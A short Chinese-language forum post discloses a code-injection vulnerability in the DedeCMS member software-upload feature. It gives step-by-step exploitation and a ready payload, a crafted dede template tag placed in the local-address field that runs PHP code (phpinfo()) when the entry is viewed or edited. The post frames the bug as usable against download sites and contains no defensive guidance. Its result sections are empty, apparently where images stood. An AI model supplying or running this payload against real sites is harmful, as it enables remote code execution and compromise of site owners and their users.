因为鸡肋,所以发出来。说下利用方法:

    注册会员,上传软件;本地地址中填入a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57},发表后查看或修改即可执行。

    生成的解析文件内容如下:

    成功效果:


    这漏洞鸡肋之处在于经历上次的0day冲击后,很多站点已经关闭了会员功能或者直接删除了member目录,并且没有多少站会有软件栏目的,嗯,所以搞搞下载站之类的差不多了。